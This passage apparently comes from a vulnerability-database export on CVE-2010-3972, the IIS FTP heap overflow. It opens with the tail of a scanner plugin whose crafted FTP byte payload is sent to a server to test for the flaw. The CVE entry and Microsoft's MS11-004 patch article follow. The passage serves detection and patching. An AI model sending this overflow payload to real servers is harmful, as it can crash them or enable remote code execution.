0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff,\n0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,\n0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,\n0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef,\n0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,\n0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,\n0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,\n0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe,\n0xff, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff,\n0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff,\n0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,\n0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,\n0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xff,\n0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xfe,\n0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xff,\n0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,\n0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xfe,\n0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff,\n0xef, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef, 0xff,\n0xef, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,\n0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,\n0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff, 0xff,\n0xef, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,\n0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,\n0xef, 0xff, 0xef, 0xff, 0xef, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef,\n0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff, 0xef, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xff,\n0xef, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe,\n0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xfe, 0xff, 0xff, 0xef, 0xff, 0xef,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff, 0xef,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xfe,\n0xff, 0xfe, 0xff, 0xfe, 0xff, 0xfe, 0xff, 0xff,\n0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xfe, 0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xfe, 0xff, 0xef, 0xbb, 0xbf,\n0xfe, 0xff, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,\n0xef, 0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe,\n0xff, 0xff, 0xef, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf,\n0xff, 0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xfe,\n0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xff,\n0xef, 0xef, 0xbb, 0xbf, 0xff, 0xef, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xef,\n0xbb, 0xbf, 0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff,\n0xef, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xfe, 0xff,\n0xff, 0xef, 0xff, 0xef, 0xff, 0xef, 0xff, 0xef,\n0xef, 0xbb, 0xbf, 0xfe, 0xff, 0xff, 0xef, 0xef,\n0xbb, 0xbf, 0xff, 0xef, 0xfe, 0xff, 0xef, 0xbb,\n0xbf, 0xfe, 0xff, 0xef, 0xbb, 0xbf, 0xef, 0xbb,\n0xbf, 0xef, 0xbb, 0xbf, 0x0d, 0x0a );\n\nbanner = recv_line(socket:soc, length:100);\n\nsend(socket:soc, data:attack);\nres = recv_line(socket:soc, length:6400);\nclose(soc);\n\nif(res =~ '^\\x30\\0x31\\x20\\x27\\xef\\x83\\xb0*\\xff'){\n security_message(port:ftpPort);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:40:09", "description": "Heap-based buffer overflow in the TELNET_STREAM_CONTEXT::OnSendData function in ftpsvc.dll in Microsoft FTP Service 7.0 and 7.5 for Internet Information Services (IIS) 7.0, and IIS 7.5, allows remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via a crafted FTP command, aka \"IIS FTP Service Heap Buffer Overrun Vulnerability.\" NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2010-12-23T18:00:00", "type": "cve", "title": "CVE-2010-3972", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3972"], "modified": "2021-02-05T15:37:00", "cpe": ["cpe:/a:microsoft:internet_information_services:7.5"], "id": "CVE-2010-3972", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_information_services:7.5:*:*:*:*:*:*:*"]}], "mskb": [{"lastseen": "2021-01-01T22:35:06", "description": "<html><body><p>Resolves a vulnerability in Internet Information Services (IIS) FTP service that could allow remote code execution if an FTP server receives a specially crafted FTP command.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS11-004. To view the complete security bulletin, visit one of the following Microsoft websites:<br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201102.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201102.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms11-004.mspx\" id=\"kb-link-3\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/MS11-004.mspx</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></span></div><h2>Known Issues</h2><div class=\"kb-summary-section section\">You may be unable to uninstall this security update on a Server Core installation of Windows Server 2008 if the version of FTP 7.0 or FTP 7.5 is installed from the Microsoft Download Center. To uninstall the update in this scenario, you must temporarily uninstall FTP 7.0 or FTP 7.5 entirely, and then reinstall FTP 7.5. When you do this, the security update is also removed. <br/><br/><span class=\"text-base\">Notes</span><ul class=\"sbody-free_list\"><li>We do not recommend that you uninstall any security update. We do not recommend this workaround but are providing this information so that you can implement this workaround at your own discretion. Use this workaround at your own risk. </li><li>Your FTP server configuration will not be lost when you uninstall FTP 7.0 or FTP 7.5 entirely and then reinstall FTP 7.5. </li><li>FTP 7.0 is no longer available for download. When you use this workaround, you must reinstall FTP 7.5. We are not aware of compatibility issues between FTP 7.0 and FTP 7.5. </li></ul><br/><br/>To uninstall FTP 7.0 or FTP 7.5, follow these steps:<br/><ol class=\"sbody-num_list\"><li>Type the following command at command prompt to identify the PackageCode for the FTP version that you have installed:<br/><div class=\"indent\"><span class=\"sbody-userinput\">wmic product</span></div>For convenience, you can type the following command to create a notepad text file that lists the installed programs on the system:<br/><div class=\"indent\"><span class=\"sbody-userinput\">wmic product > C:\\<strong class=\"sbody-strong\">path</strong>\\list.txt </span></div></li><li>After you identify the PackageCode for the FTP version that you have installed, type the following command from an elevated command prompt to uninstall the FTP 7.0 or FTP 7.5 program:<br/><div class=\"indent\"><span class=\"sbody-userinput\">msiexec /uninstall {ProductID}</span></div>For example, depending on the FTP version that you have installed, the command that you type may resemble either of the following: <br/><br/><span class=\"text-base\">FTP 7.0</span><div class=\"indent\"><span class=\"sbody-userinput\">msiexec.exe /uninstall {15ABFD45-B97E-483D-A6C9-28AA751A1C01}</span></div><span class=\"text-base\">FTP 7.5</span><div class=\"indent\"><span class=\"sbody-userinput\">msiexec.exe /uninstall {790AE609-3122-4C3E-9EA8-687F7B00ED0E}</span></div></li></ol><h3 class=\"sbody-h3\">Information about the security update for IIS FTP 7.5 for Windows Vista and Windows Server 2008</h3>In some scenarios, you may have to install an earlier version of IIS FTP 7.5 for Windows Vista. We are providing versions\u00a07.5.7055.14307\u00a0and\u00a07.5.7056.14445 on the Microsoft Download Center.\u00a0<span>The following files are available for download from the Microsoft Download Center:<br/></span><br/><h4 class=\"sbody-h4\">Security Update for FTP Service 7.5 for IIS 7.0 version 7.5.7055.14307 for x86-based versions of Windows Vista (KB2489256)\u00a0</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://www.microsoft.com/download/details.aspx?familyid=c2fb0157-e019-47ac-af80-79217e01f24d\" id=\"kb-link-8\" target=\"_self\">Download the ftp75_en_x86_kb2489256.msp package now.</a></span><h4 class=\"sbody-h4\">Security Update for FTP Service 7.5 for IIS 7.0 version 7.5.7055.14307\u00a0for x64-based versions of Windows Vista (KB2489256)\u00a0</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://www.microsoft.com/download/details.aspx?familyid=ef04be0d-3628-4487-aa16-ab0fa814679f\" id=\"kb-link-9\" target=\"_self\">Download the ftp75_en_x64_kb2489256.msp package now.</a></span><h4 class=\"sbody-h4\">Security Update for FTP Service 7.5 for IIS 7.0 version 7.5.7055.14307 for x86-based versions of Windows Server 2008 (KB2489256)\u00a0</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://www.microsoft.com/download/en/details.aspx?id=19864\" id=\"kb-link-10\" target=\"_self\">Download the ftp75_en_x86_kb2489256.msp package now.</a></span><h4 class=\"sbody-h4\">Security Update for\u00a0FTP Service 7.5 for IIS 7.0 version 7.5.7055.14307 for x64-based versions of Windows Server 2008 (KB2489256)\u00a0</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://www.microsoft.com/download/en/details.aspx?id=14034\" id=\"kb-link-11\" target=\"_self\">Download the ftp75_en_x64_kb2489256.msp package now.</a></span><h4 class=\"sbody-h4\">Security Update for\u00a0FTP Service 7.5 for IIS 7.0 version 7.5.7056.14445 for x86-based versions of Windows Server 2008 (KB2489256)\u00a0</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://www.microsoft.com/download/en/details.aspx?familyid=4dfa0a25-b7e3-4fb6-a351-58ec3f8a8435\" id=\"kb-link-12\" target=\"_self\">Download the ftp75_x86_kb2489256.msp package now.</a></span><h4 class=\"sbody-h4\">Security Update for FTP Service 7.5 for IIS 7.0 version 7.5.7056.14445 for x86-based versions of Windows Vista (KB2489256)\u00a0</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://www.microsoft.com/download/en/details.aspx?familyid=da9b7982-1c6b-45ac-8dd0-d7101bb83949\" id=\"kb-link-13\" target=\"_self\">Download the ftp75_x86_kb2489256.msp package now.</a></span><h4 class=\"sbody-h4\">Security Update for FTP Service 7.5 for IIS 7.0 version 7.5.7056.14445 for x64-based versions of Windows Server 2008 (KB2489256)\u00a0</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://www.microsoft.com/download/en/details.aspx?familyid=a98a74c1-0c91-446d-b822-fe57ff06d90b\" id=\"kb-link-14\" target=\"_self\">Download the ftp75_x64_kb2489256.msp package now.</a></span><h4 class=\"sbody-h4\">Security Update for FTP Service 7.5 for IIS 7.0 version 7.5.7056.14445 for x64-based versions of Windows Vista (KB2489256) </h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://www.microsoft.com/download/en/details.aspx?familyid=6e4b9878-b5d2-4025-8839-b41515932cf2\" id=\"kb-link-15\" target=\"_self\">Download the ftp75_x64_kb2489256.msp package now.</a></span><br/><br/><span>Release Date: April 12, 2011<br/><br/>For more information about how to download Microsoft support files, click the following article number to view the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/119591\" id=\"kb-link-16\">119591 </a> How to obtain Microsoft support files from online services<br/></div>Microsoft scanned this file for viruses. Microsoft used the most current virus-detection software that was available on the date that the file was posted. The file is stored on security-enhanced servers that help prevent any unauthorized changes to the file.<br/></span><h4 class=\"sbody-h4\">Installation instructions</h4>To determine the correct security update to install in your environment, follow these steps:<br/><br/><br/><ol class=\"sbody-num_list\"><li>Open the %system32%\\inetsrv folder, right-click the Ftpsvc.dll file, and then click <strong class=\"uiterm\">Properties</strong>. <br/><br/><br/>On a 34-bit x86-based system: <ul class=\"sbody-free_list\"><li>Install ftp75_en_x86_kb2489256.msp if the version of the Ftpsvc.dll file in the %system32%\\inetsrv directory is between 7.5.7055.14307 and 7.5.7055.14310. </li><li>Install ftp75_x86_kb2489256.msp of the version of the Ftpsvc.dll file in the %system32%\\inetsrv directory is between 7.5.7055.14445 and 7.5.7600.14978. </li></ul> <br/><br/>On a 64-bit system:<br/><ul class=\"sbody-free_list\"><li>Install ftp75_en_x64_kb2489256.msp if the version of the Ftpsvc.dll file in the %system32%\\inetsrv directory is between 7.5.7055.14307 and 7.5.7055.14310. </li><li>Install ftp75_x64_kb2489256.msp of the version of the Ftpsvc.dll file in the %system32%\\inetsrv directory is between 7.5.7055.14445 and 7.5.7600.14978. </li></ul></li><li>Based on the previous step, visit the Download Center page that corresponds to the version that you need. Click <span class=\"text-base\">Download</span>, and then do one of the following: <ol class=\"sbody-alpha_list\"><li>Click <span class=\"text-base\">Run</span> to start the installation immediately. </li><li>Click <span class=\"text-base\">Save</span> to copy the download to your computer for installation at a later time. </li></ol></li></ol></div><h2>FILE INFORMATION</h2><div class=\"kb-summary-section section\">The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time and with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you 